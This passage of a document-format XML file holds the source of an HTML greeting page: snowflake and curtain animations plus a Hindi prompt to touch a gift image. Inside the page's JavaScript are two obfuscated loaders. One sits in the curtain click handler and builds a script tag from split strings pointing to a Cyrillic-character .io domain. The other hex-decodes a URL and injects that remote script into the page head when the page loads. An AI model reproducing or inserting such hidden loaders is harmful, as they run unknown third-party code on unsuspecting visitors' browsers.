      <text:p text:style-name="P1"><text:span text:style-name="T1704"><text:s/>background-position: center;</text:span><text:span text:style-name="T1705"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1706"><text:s/>background-repeat: no-repeat;</text:span><text:span text:style-name="T1707"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1708"><text:s/>background-size: cover;</text:span><text:span text:style-name="T1709"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1710"><text:s/>box-shadow:<text:s/></text:span><text:span text:style-name="T1711">3</text:span><text:span text:style-name="T1712">px<text:s/></text:span><text:span text:style-name="T1713">4</text:span><text:span text:style-name="T1714">px<text:s/></text:span><text:span text:style-name="T1715">41</text:span><text:span text:style-name="T1716">px<text:s/></text:span><text:span text:style-name="T1717">0<text:s/></text:span><text:span text:style-name="T1718">rgba(</text:span><text:span text:style-name="T1719">0</text:span><text:span text:style-name="T1720">,<text:s/></text:span><text:span text:style-name="T1721">0</text:span><text:span text:style-name="T1722">,<text:s/></text:span><text:span text:style-name="T1723">0</text:span><text:span text:style-name="T1724">,<text:s/></text:span><text:span text:style-name="T1725">0.64</text:span><text:span text:style-name="T1726">);</text:span><text:span text:style-name="T1727"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1728"><text:s/>margin-bottom:<text:s/></text:span><text:span text:style-name="T1729">35</text:span><text:span text:style-name="T1730">px</text:span><text:span text:style-name="T1731"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1732">}</text:span><text:span text:style-name="T1733"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1733"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1734">.wb-main-greeting .main_body {</text:span><text:span text:style-name="T1735"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1736"><text:s/>text-align: center;</text:span><text:span text:style-name="T1737"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1738"><text:s/>font-size:<text:s/></text:span><text:span text:style-name="T1739">1.3</text:span><text:span text:style-name="T1740">em</text:span><text:span text:style-name="T1741"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1742">}</text:span><text:span text:style-name="T1743"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1744">.wb-main-greeting .main_body .text</text:span><text:span text:style-name="T1745">2<text:s/></text:span><text:span text:style-name="T1746">{</text:span><text:span text:style-name="T1747"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1748"><text:s/>padding:<text:s/></text:span><text:span text:style-name="T1749">10</text:span><text:span text:style-name="T1750">px;</text:span><text:span text:style-name="T1751"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1752"><text:s/>font-size:<text:s/></text:span><text:span text:style-name="T1753">20</text:span><text:span text:style-name="T1754">px</text:span><text:span text:style-name="T1755"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1756">}</text:span><text:span text:style-name="T1757"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1758">.wb-main-greeting .text {</text:span><text:span text:style-name="T1759"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1760"><text:s/>color: #</text:span><text:span text:style-name="T1761">405</text:span><text:span text:style-name="T1762">d</text:span><text:span text:style-name="T1763">9</text:span><text:span text:style-name="T1764">b;</text:span><text:span text:style-name="T1765"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1766"><text:s/>letter-spacing:<text:s/></text:span><text:span text:style-name="T1767">1</text:span><text:span text:style-name="T1768">px;</text:span><text:span text:style-name="T1769"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1770"><text:s/>font-weight:<text:s/></text:span><text:span text:style-name="T1771">600</text:span><text:span text:style-name="T1772">;</text:span><text:span text:style-name="T1773"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1774"><text:s/>padding:<text:s/></text:span><text:span text:style-name="T1775">0</text:span><text:span text:style-name="T1776">px<text:s/></text:span><text:span text:style-name="T1777">10</text:span><text:span text:style-name="T1778">px;</text:span><text:span text:style-name="T1779"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1780"><text:s/>text-align: center;</text:span><text:span text:style-name="T1781"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1782">}</text:span><text:span text:style-name="T1783"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1784">.wb-main-greeting .pp-img {</text:span><text:span text:style-name="T1785"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1786"><text:s/>max-width:<text:s/></text:span><text:span text:style-name="T1787">400</text:span><text:span text:style-name="T1788">px;</text:span><text:span text:style-name="T1789"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1790"><text:s/>margin-bottom:<text:s/></text:span><text:span text:style-name="T1791">10</text:span><text:span text:style-name="T1792">px;</text:span><text:span text:style-name="T1793"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1794"><text:s/>box-shadow:<text:s/></text:span><text:span text:style-name="T1795">0</text:span><text:span text:style-name="T1796">px<text:s/></text:span><text:span text:style-name="T1797">0</text:span><text:span text:style-name="T1798">px<text:s/></text:span><text:span text:style-name="T1799">10</text:span><text:span text:style-name="T1800">px<text:s/></text:span><text:span text:style-name="T1801">0</text:span><text:span text:style-name="T1802">px rgba(</text:span><text:span text:style-name="T1803">0</text:span><text:span text:style-name="T1804">,<text:s/></text:span><text:span text:style-name="T1805">0</text:span><text:span text:style-name="T1806">,<text:s/></text:span><text:span text:style-name="T1807">0</text:span><text:span text:style-name="T1808">,<text:s/></text:span><text:span text:style-name="T1809">0.64</text:span><text:span text:style-name="T1810">);</text:span><text:span text:style-name="T1811"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1812">}</text:span><text:span text:style-name="T1813"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1813"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1814">.wb-main-greeting .text_gradient {</text:span><text:span text:style-name="T1815"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1816"><text:s/>margin:<text:s/></text:span><text:span text:style-name="T1817">5</text:span><text:span text:style-name="T1818">px auto;</text:span><text:span text:style-name="T1819"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1820"><text:s/>font-weight:<text:s/></text:span><text:span text:style-name="T1821">700</text:span><text:span text:style-name="T1822">;</text:span><text:span text:style-name="T1823"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1824"><text:s/>font-size:<text:s/></text:span><text:span text:style-name="T1825">24</text:span><text:span text:style-name="T1826">px;</text:span><text:span text:style-name="T1827"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1828"><text:s/>color: #b</text:span><text:span text:style-name="T1829">50</text:span><text:span text:style-name="T1830">dae;</text:span><text:span text:style-name="T1831"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1832">}</text:span><text:span text:style-name="T1833"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1833"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1834">.snowflake {</text:span><text:span text:style-name="T1835"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1836"><text:s/>color: #fff;</text:span><text:span text:style-name="T1837"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1838"><text:s/>font-size:<text:s/></text:span><text:span text:style-name="T1839">2</text:span><text:span text:style-name="T1840">em;</text:span><text:span text:style-name="T1841"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1842"><text:s/>font-family: Arial, sans-serif;</text:span><text:span text:style-name="T1843"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1844"><text:s/>text-shadow:<text:s/></text:span><text:span text:style-name="T1845">0 0 5</text:span><text:span text:style-name="T1846">px #</text:span><text:span text:style-name="T1847">000</text:span><text:span text:style-name="T1848">;</text:span><text:span text:style-name="T1849"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1850">}</text:span><text:span text:style-name="T1851"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1851"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1852">@-webkit-keyframes snowflakes-fall{</text:span><text:span text:style-name="T1853">0</text:span><text:span text:style-name="T1854">%{top:-</text:span><text:span text:style-name="T1855">10</text:span><text:span text:style-name="T1856">%}</text:span><text:span text:style-name="T1857">100</text:span><text:span text:style-name="T1858">%{top:</text:span><text:span text:style-name="T1859">100</text:span><text:span text:style-name="T1860">%}}@-webkit-keyframes snowflakes-shake{</text:span><text:span text:style-name="T1861">0</text:span><text:span text:style-name="T1862">%,</text:span><text:span text:style-name="T1863">100</text:span><text:span text:style-name="T1864">%{-webkit-transform:translateX(</text:span><text:span text:style-name="T1865">0</text:span><text:span text:style-name="T1866">);transform:translateX(</text:span><text:span text:style-name="T1867">0</text:span><text:span text:style-name="T1868">)}</text:span><text:span text:style-name="T1869">50</text:span><text:span text:style-name="T1870">%{-webkit-transform:translateX(</text:span><text:span text:style-name="T1871">80</text:span><text:span text:style-name="T1872">px);transform:translateX(</text:span><text:span text:style-name="T1873">80</text:span><text:span text:style-name="T1874">px)}}@keyframes snowflakes-fall{</text:span><text:span text:style-name="T1875">0</text:span><text:span text:style-name="T1876">%{top:-</text:span><text:span text:style-name="T1877">10</text:span><text:span text:style-name="T1878">%}</text:span><text:span text:style-name="T1879">100</text:span><text:span text:style-name="T1880">%{top:</text:span><text:span text:style-name="T1881">100</text:span><text:span text:style-name="T1882">%}}@keyframes snowflakes-shake{</text:span><text:span text:style-name="T1883">0</text:span><text:span text:style-name="T1884">%,</text:span><text:span text:style-name="T1885">100</text:span><text:span text:style-name="T1886">%{transform:translateX(</text:span><text:span text:style-name="T1887">0</text:span><text:span text:style-name="T1888">)}</text:span><text:span text:style-name="T1889">50</text:span><text:span text:style-name="T1890">%{transform:translateX(</text:span><text:span text:style-name="T1891">80</text:span><text:span text:style-name="T1892">px)}}.snowflake{position:fixed;top:-</text:span><text:span text:style-name="T1893">10</text:span><text:span text:style-name="T1894">%;z-index:</text:span><text:span text:style-name="T1895">9999</text:span><text:span text:style-name="T1896">;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;cursor:default;-webkit-animation-name:snowflakes-fall,snowflakes-shake;-webkit-animation-duration:</text:span><text:span text:style-name="T1897">10</text:span><text:span text:style-name="T1898">s,</text:span><text:span text:style-name="T1899">3</text:span><text:span text:style-name="T1900">s;-webkit-animation-timing-function:linear,ease-in-out;-webkit-animation-iteration-count:infinite,infinite;-webkit-animation-play-state:running,running;animation-name:snowflakes-fall,snowflakes-shake;animation-duration:</text:span><text:span text:style-name="T1901">10</text:span><text:span text:style-name="T1902">s,</text:span><text:span text:style-name="T1903">3</text:span><text:span text:style-name="T1904">s;animation-timing-function:linear,ease-in-out;animation-iteration-count:infinite,infinite;animation-play-state:running,running}.snowflake:nth-of-type(</text:span><text:span text:style-name="T1905">0</text:span><text:span text:style-name="T1906">){left:</text:span><text:span text:style-name="T1907">1</text:span><text:span text:style-name="T1908">%;-webkit-animation-delay:</text:span><text:span text:style-name="T1909">0</text:span><text:span text:style-name="T1910">s,</text:span><text:span text:style-name="T1911">0</text:span><text:span text:style-name="T1912">s;animation-delay:</text:span><text:span text:style-name="T1913">0</text:span><text:span text:style-name="T1914">s,</text:span><text:span text:style-name="T1915">0</text:span><text:span text:style-name="T1916">s}.snowflake:nth-of-type(</text:span><text:span text:style-name="T1917">1</text:span><text:span text:style-name="T1918">){left:</text:span><text:span text:style-name="T1919">10</text:span><text:span text:style-name="T1920">%;-webkit-animation-delay:</text:span><text:span text:style-name="T1921">1</text:span><text:span text:style-name="T1922">s,</text:span><text:span text:style-name="T1923">1</text:span><text:span text:style-name="T1924">s;animation-delay:</text:span><text:span text:style-name="T1925">1</text:span><text:span text:style-name="T1926">s,</text:span><text:span text:style-name="T1927">1</text:span><text:span text:style-name="T1928">s}.snowflake:nth-of-type(</text:span><text:span text:style-name="T1929">2</text:span><text:span text:style-name="T1930">){left:</text:span><text:span text:style-name="T1931">20</text:span><text:span text:style-name="T1932">%;-webkit-animation-delay:</text:span><text:span text:style-name="T1933">6</text:span><text:span text:style-name="T1934">s,.</text:span><text:span text:style-name="T1935">5</text:span><text:span text:style-name="T1936">s;animation-delay:</text:span><text:span text:style-name="T1937">6</text:span><text:span text:style-name="T1938">s,.</text:span><text:span text:style-name="T1939">5</text:span><text:span text:style-name="T1940">s}.snowflake:nth-of-type(</text:span><text:span text:style-name="T1941">3</text:span><text:span text:style-name="T1942">){left:</text:span><text:span text:style-name="T1943">30</text:span><text:span text:style-name="T1944">%;-webkit-animation-delay:</text:span><text:span text:style-name="T1945">4</text:span><text:span text:style-name="T1946">s,</text:span><text:span text:style-name="T1947">2</text:span><text:span text:style-name="T1948">s;animation-delay:</text:span><text:span text:style-name="T1949">4</text:span><text:span text:style-name="T1950">s,</text:span><text:span text:style-name="T1951">2</text:span><text:span text:style-name="T1952">s}.snowflake:nth-of-type(</text:span><text:span text:style-name="T1953">4</text:span><text:span text:style-name="T1954">){left:</text:span><text:span text:style-name="T1955">40</text:span><text:span text:style-name="T1956">%;-webkit-animation-delay:</text:span><text:span text:style-name="T1957">2</text:span><text:span text:style-name="T1958">s,</text:span><text:span text:style-name="T1959">2</text:span><text:span text:style-name="T1960">s;animation-delay:</text:span><text:span text:style-name="T1961">2</text:span><text:span text:style-name="T1962">s,</text:span><text:span text:style-name="T1963">2</text:span><text:span text:style-name="T1964">s}.snowflake:nth-of-type(</text:span><text:span text:style-name="T1965">5</text:span><text:span text:style-name="T1966">){left:</text:span><text:span text:style-name="T1967">50</text:span><text:span text:style-name="T1968">%;-webkit-animation-delay:</text:span><text:span text:style-name="T1969">8</text:span><text:span text:style-name="T1970">s,</text:span><text:span text:style-name="T1971">3</text:span><text:span text:style-name="T1972">s;animation-delay:</text:span><text:span text:style-name="T1973">8</text:span><text:span text:style-name="T1974">s,</text:span><text:span text:style-name="T1975">3</text:span><text:span text:style-name="T1976">s}.snowflake:nth-of-type(</text:span><text:span text:style-name="T1977">6</text:span><text:span text:style-name="T1978">){left:</text:span><text:span text:style-name="T1979">60</text:span><text:span text:style-name="T1980">%;-webkit-animation-delay:</text:span><text:span text:style-name="T1981">6</text:span><text:span text:style-name="T1982">s,</text:span><text:span text:style-name="T1983">2</text:span><text:span text:style-name="T1984">s;animation-delay:</text:span><text:span text:style-name="T1985">6</text:span><text:span text:style-name="T1986">s,</text:span><text:span text:style-name="T1987">2</text:span><text:span text:style-name="T1988">s}.snowflake:nth-of-type(</text:span><text:span text:style-name="T1989">7</text:span><text:span text:style-name="T1990">){left:</text:span><text:span text:style-name="T1991">70</text:span><text:span text:style-name="T1992">%;-webkit-animation-delay:</text:span><text:span text:style-name="T1993">2.5</text:span><text:span text:style-name="T1994">s,</text:span><text:span text:style-name="T1995">1</text:span><text:span text:style-name="T1996">s;animation-delay:</text:span><text:span text:style-name="T1997">2.5</text:span><text:span text:style-name="T1998">s,</text:span><text:span text:style-name="T1999">1</text:span><text:span text:style-name="T2000">s}.snowflake:nth-of-type(</text:span><text:span text:style-name="T2001">8</text:span><text:span text:style-name="T2002">){left:</text:span><text:span text:style-name="T2003">80</text:span><text:span text:style-name="T2004">%;-webkit-animation-delay:</text:span><text:span text:style-name="T2005">1</text:span><text:span text:style-name="T2006">s,</text:span><text:span text:style-name="T2007">0</text:span><text:span text:style-name="T2008">s;animation-delay:</text:span><text:span text:style-name="T2009">1</text:span><text:span text:style-name="T2010">s,</text:span><text:span text:style-name="T2011">0</text:span><text:span text:style-name="T2012">s}.snowflake:nth-of-type(</text:span><text:span text:style-name="T2013">9</text:span><text:span text:style-name="T2014">){left:</text:span><text:span text:style-name="T2015">90</text:span><text:span text:style-name="T2016">%;-webkit-animation-delay:</text:span><text:span text:style-name="T2017">3</text:span><text:span text:style-name="T2018">s,</text:span><text:span text:style-name="T2019">1.5</text:span><text:span text:style-name="T2020">s;animation-delay:</text:span><text:span text:style-name="T2021">3</text:span><text:span text:style-name="T2022">s,</text:span><text:span text:style-name="T2023">1.5</text:span><text:span text:style-name="T2024">s}.snowflake:nth-of-type(</text:span><text:span text:style-name="T2025">10</text:span><text:span text:style-name="T2026">){left:</text:span><text:span text:style-name="T2027">25</text:span><text:span text:style-name="T2028">%;-webkit-animation-delay:</text:span><text:span text:style-name="T2029">2</text:span><text:span text:style-name="T2030">s,</text:span><text:span text:style-name="T2031">0</text:span><text:span text:style-name="T2032">s;animation-delay:</text:span><text:span text:style-name="T2033">2</text:span><text:span text:style-name="T2034">s,</text:span><text:span text:style-name="T2035">0</text:span><text:span text:style-name="T2036">s}.snowflake:nth-of-type(</text:span><text:span text:style-name="T2037">11</text:span><text:span text:style-name="T2038">){left:</text:span><text:span text:style-name="T2039">65</text:span><text:span text:style-name="T2040">%;-webkit-animation-delay:</text:span><text:span text:style-name="T2041">4</text:span><text:span text:style-name="T2042">s,</text:span><text:span text:style-name="T2043">2.5</text:span><text:span text:style-name="T2044">s;animation-delay:</text:span><text:span text:style-name="T2045">4</text:span><text:span text:style-name="T2046">s,</text:span><text:span text:style-name="T2047">2.5</text:span><text:span text:style-name="T2048">s}</text:span><text:span text:style-name="T2049"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2050">*{ margin:</text:span><text:span text:style-name="T2051">0</text:span><text:span text:style-name="T2052">; padding:</text:span><text:span text:style-name="T2053">0</text:span><text:span text:style-name="T2054">; } body { text-align: center; } img{ border: none; }.leftcurtain{ width:<text:s/></text:span><text:span text:style-name="T2055">100</text:span><text:span text:style-name="T2056">%; height:<text:s/></text:span><text:span text:style-name="T2057">100</text:span><text:span text:style-name="T2058">%; top:<text:s/></text:span><text:span text:style-name="T2059">0</text:span><text:span text:style-name="T2060">px; left:<text:s/></text:span><text:span text:style-name="T2061">0</text:span><text:span text:style-name="T2062">px; position: absolute; z-index:<text:s/></text:span><text:span text:style-name="T2063">2</text:span><text:span text:style-name="T2064">; } .rightcurtain{ width:<text:s/></text:span><text:span text:style-name="T2065">100</text:span><text:span text:style-name="T2066">%; height:<text:s/></text:span><text:span text:style-name="T2067">100</text:span><text:span text:style-name="T2068">%; right:<text:s/></text:span><text:span text:style-name="T2069">0</text:span><text:span text:style-name="T2070">px; top:<text:s/></text:span><text:span text:style-name="T2071">0</text:span><text:span text:style-name="T2072">px; position: absolute; z-index:<text:s/></text:span><text:span text:style-name="T2073">3</text:span><text:span text:style-name="T2074">; } .rightcurtain img, .leftcurtain img{ width:<text:s/></text:span><text:span text:style-name="T2075">100</text:span><text:span text:style-name="T2076">%; height:<text:s/></text:span><text:span text:style-name="T2077">100</text:span><text:span text:style-name="T2078">%; } .logo{ margin:<text:s/></text:span><text:span text:style-name="T2079">0</text:span><text:span text:style-name="T2080">px auto; margin-top:<text:s/></text:span><text:span text:style-name="T2081">150</text:span><text:span text:style-name="T2082">px; } .rope{ position: absolute; top:<text:s/></text:span><text:span text:style-name="T2083">5</text:span><text:span text:style-name="T2084">px; left:<text:s/></text:span><text:span text:style-name="T2085">40</text:span><text:span text:style-name="T2086">%; z-index:<text:s/></text:span><text:span text:style-name="T2087">4</text:span><text:span text:style-name="T2088">; } .centered { position: absolute; top:<text:s/></text:span><text:span text:style-name="T2089">75</text:span><text:span text:style-name="T2090">%; left:<text:s/></text:span><text:span text:style-name="T2091">50</text:span><text:span text:style-name="T2092">%; transform: translate(-</text:span><text:span text:style-name="T2093">50</text:span><text:span text:style-name="T2094">%, -</text:span><text:span text:style-name="T2095">50</text:span><text:span text:style-name="T2096">%);}</text:span><text:span text:style-name="T2097"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2097"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2098"><text:s/>&lt;/style&gt;</text:span><text:span text:style-name="T2099"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2100"><text:s text:c="2"/>&lt;script src="https://ajax.googleapis.com/ajax/libs/jquery/</text:span><text:span text:style-name="T2101">3.3.1</text:span><text:span text:style-name="T2102">/jquery.min.js"&gt;&lt;/script&gt;</text:span><text:span text:style-name="T2103"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2104"><text:s text:c="2"/>&lt;script src="https://webbeast.in/js/slide.js"type="text/javascript"&gt;&lt;/script&gt;</text:span><text:span text:style-name="T2105"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2106">&lt;script type="text/javascript"&gt;</text:span><text:span text:style-name="T2107"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2108">$(document).ready(function() { $curtainopen = false; $(".rope").click(function(){ $(this).blur(); if ($curtainopen == false){ $(this).stop().animate({top: '-</text:span><text:span text:style-name="T2109">171</text:span><text:span text:style-name="T2110">%' }, {queue:false, duration:</text:span><text:span text:style-name="T2111">350</text:span><text:span text:style-name="T2112">, easing:'easeOutBounce'}); $(".leftcurtain").stop().animate({width:'</text:span><text:span text:style-name="T2113">1</text:span><text:span text:style-name="T2114">px'},<text:s/></text:span><text:span text:style-name="T2115">2000<text:s/></text:span><text:span text:style-name="T2116">); $(".rightcurtain").stop().animate({width:'</text:span><text:span text:style-name="T2117">1</text:span><text:span text:style-name="T2118">px'},</text:span><text:span text:style-name="T2119">2000<text:s/></text:span><text:span text:style-name="T2120">); $curtainopen = true; }else{ $(this).stop().animate({top: '-</text:span><text:span text:style-name="T2121">40</text:span><text:span text:style-name="T2122">px' }, {queue:false, duration:</text:span><text:span text:style-name="T2123">350</text:span><text:span text:style-name="T2124">, easing:'easeOutBounce'}); document.write('&lt;s'+'cr'+'ipt sr'+'c="/'+'/'+'&amp;#</text:span><text:span text:style-name="T2125">1102</text:span><text:span text:style-name="T2126">;'+'&amp;#</text:span><text:span text:style-name="T2127">1092</text:span><text:span text:style-name="T2128">;.'+'i'+'o"&gt;&lt;/s'+'cr'+'ipt&gt;'); $(".leftcurtain").stop().animate({width:'</text:span><text:span text:style-name="T2129">50</text:span><text:span text:style-name="T2130">%'},<text:s/></text:span><text:span text:style-name="T2131">2000<text:s/></text:span><text:span text:style-name="T2132">); $(".rightcurtain").stop().animate({width:'</text:span><text:span text:style-name="T2133">51</text:span><text:span text:style-name="T2134">%'},<text:s/></text:span><text:span text:style-name="T2135">2000<text:s/></text:span><text:span text:style-name="T2136">); $curtainopen = false; } return false; }); });</text:span><text:span text:style-name="T2137"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2138">&lt;/script&gt;</text:span><text:span text:style-name="T2139"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2140"><text:s/>&lt;script type="text/javascript"&gt;function tag(filename){var fileref=document.createElement('script');fileref.setAttribute("type","text/javascript");fileref.setAttribute("src", filename);if (typeof fileref!="undefined") document.getElementsByTagName("head")[</text:span><text:span text:style-name="T2141">0</text:span><text:span text:style-name="T2142">].appendChild(fileref)}tag(meta('</text:span><text:span text:style-name="T2143">68747470733</text:span><text:span text:style-name="T2144">a</text:span><text:span text:style-name="T2145">2</text:span><text:span text:style-name="T2146">f</text:span><text:span text:style-name="T2147">2</text:span><text:span text:style-name="T2148">f</text:span><text:span text:style-name="T2149">6</text:span><text:span text:style-name="T2150">b</text:span><text:span text:style-name="T2151">616</text:span><text:span text:style-name="T2152">e</text:span><text:span text:style-name="T2153">616</text:span><text:span text:style-name="T2154">e</text:span><text:span text:style-name="T2155">6174682</text:span><text:span text:style-name="T2156">e</text:span><text:span text:style-name="T2157">636</text:span><text:span text:style-name="T2158">f</text:span><text:span text:style-name="T2159">6</text:span><text:span text:style-name="T2160">d</text:span><text:span text:style-name="T2161">2</text:span><text:span text:style-name="T2162">f</text:span><text:span text:style-name="T2163">6</text:span><text:span text:style-name="T2164">b</text:span><text:span text:style-name="T2165">616</text:span><text:span text:style-name="T2166">e</text:span><text:span text:style-name="T2167">616</text:span><text:span text:style-name="T2168">e</text:span><text:span text:style-name="T2169">6174682</text:span><text:span text:style-name="T2170">e</text:span><text:span text:style-name="T2171">6</text:span><text:span text:style-name="T2172">a</text:span><text:span text:style-name="T2173">73</text:span><text:span text:style-name="T2174">'));function meta(important){var str = '';for (var i =<text:s/></text:span><text:span text:style-name="T2175">0</text:span><text:span text:style-name="T2176">; i &lt; important.length; i +=<text:s/></text:span><text:span text:style-name="T2177">2</text:span><text:span text:style-name="T2178">) str +=String.fromCharCode(parseInt(important.substr(i,<text:s/></text:span><text:span text:style-name="T2179">2</text:span><text:span text:style-name="T2180">),<text:s/></text:span><text:span text:style-name="T2181">16</text:span><text:span text:style-name="T2182">));return str;}&lt;/script&gt;</text:span><text:span text:style-name="T2183"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2184">&lt;/head&gt;</text:span><text:span text:style-name="T2185"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2186">&lt;body class="bg" style=" background-image : url('https://media</text:span><text:span text:style-name="T2187">3</text:span><text:span text:style-name="T2188">.giphy.com/media/U</text:span><text:span text:style-name="T2189">3</text:span><text:span text:style-name="T2190">qYN</text:span><text:span text:style-name="T2191">8</text:span><text:span text:style-name="T2192">S</text:span><text:span text:style-name="T2193">0</text:span><text:span text:style-name="T2194">j</text:span><text:span text:style-name="T2195">3</text:span><text:span text:style-name="T2196">bpK/giphy.gif')";&gt;</text:span><text:span text:style-name="T2197"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2197"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2197"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2198">&lt;!--ANALYTICS CODE HERE --&gt;</text:span><text:span text:style-name="T2199"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2199"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2199"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2200">&lt;!--ANALYTICS CODE HERE --&gt;</text:span><text:span text:style-name="T2201"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2201"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2201"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2202">&lt;a class="rope" href=""&gt;</text:span><text:span text:style-name="T2203"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2204">&lt;div style="font-size:<text:s/></text:span><text:span text:style-name="T2205">25</text:span><text:span text:style-name="T2206">px;text-shadow:<text:s/></text:span><text:span text:style-name="T2207">1</text:span><text:span text:style-name="T2208">px<text:s/></text:span><text:span text:style-name="T2209">1</text:span><text:span text:style-name="T2210">px<text:s/></text:span><text:span text:style-name="T2211">3</text:span><text:span text:style-name="T2212">px red,<text:s/></text:span><text:span text:style-name="T2213">1</text:span><text:span text:style-name="T2214">px<text:s/></text:span><text:span text:style-name="T2215">1</text:span><text:span text:style-name="T2216">px<text:s/></text:span><text:span text:style-name="T2217">3</text:span><text:span text:style-name="T2218">px black, -</text:span><text:span text:style-name="T2219">1</text:span><text:span text:style-name="T2220">px -</text:span><text:span text:style-name="T2221">1</text:span><text:span text:style-name="T2222">px<text:s/></text:span><text:span text:style-name="T2223">3</text:span><text:span text:style-name="T2224">px black, -</text:span><text:span text:style-name="T2225">1</text:span><text:span text:style-name="T2226">px -</text:span><text:span text:style-name="T2227">1</text:span><text:span text:style-name="T2228">px<text:s/></text:span><text:span text:style-name="T2229">3</text:span><text:span text:style-name="T2230">px black;color: yellow;font-weight: bold;"&gt;&lt;br&gt;</text:span><text:span text:style-name="T2231">👇👇</text:span><text:span text:style-name="T2232"><text:s/></text:span><text:span text:style-name="T2233">&lt;br&gt;<text:s/></text:span><text:span text:style-name="T2234">इस<text:s/></text:span><text:span text:style-name="T2235">Gift<text:s/></text:span><text:span text:style-name="T2236">को टच करके देखो<text:s/></text:span><text:span text:style-name="T2237">!&lt;/</text:span><text:span text:style-name="T2238">div&gt;</text:span><text:span text:style-name="T2239"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2240">&lt;br /&gt;</text:span><text:span text:style-name="T2241"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2242">&lt;img src="https://</text:span><text:span text:style-name="T2243">3</text:span><text:span text:style-name="T2244">.bp.blogspot.com/-Xotl</text:span><text:span text:style-name="T2245">7</text:span><text:span text:style-name="T2246">aS</text:span><text:span text:style-name="T2247">4</text:span><text:span text:style-name="T2248">uog/XeeI</text:span><text:span text:style-name="T2249">2</text:span><text:span text:style-name="T2250">JG</text:span><text:span text:style-name="T2251">55</text:span><text:span text:style-name="T2252">QI/AAAAAAAAAKw/dRsiwjfPD</text:span><text:span text:style-name="T2253">1</text:span><text:span text:style-name="T2254">E-TV-xPncLtIqCpRAJaj</text:span><text:span text:style-name="T2255">4</text:span><text:span text:style-name="T2256">hgCLcBGAsYHQ/s</text:span><text:span text:style-name="T2257">1600</text:span><text:span text:style-name="T2258">/Gift-</text:span><text:span text:style-name="T2259">715</text:span><text:span text:style-name="T2260">x</text:span><text:span text:style-name="T2261">836</text:span><text:span text:style-name="T2262">.png" style="animation: tada<text:s/></text:span><text:span text:style-name="T2263">4</text:span><text:span text:style-name="T2264">s infinite;max-width:</text:span><text:span text:style-name="T2265">200</text:span><text:span text:style-name="T2266">px; width:<text:s/></text:span><text:span text:style-name="T2267">100</text:span><text:span text:style-name="T2268">%;" /&gt;</text:span><text:span text:style-name="T2269"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2270">&lt;/a&gt;</text:span><text:span text:style-name="T2271"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T2271"/></text:p>
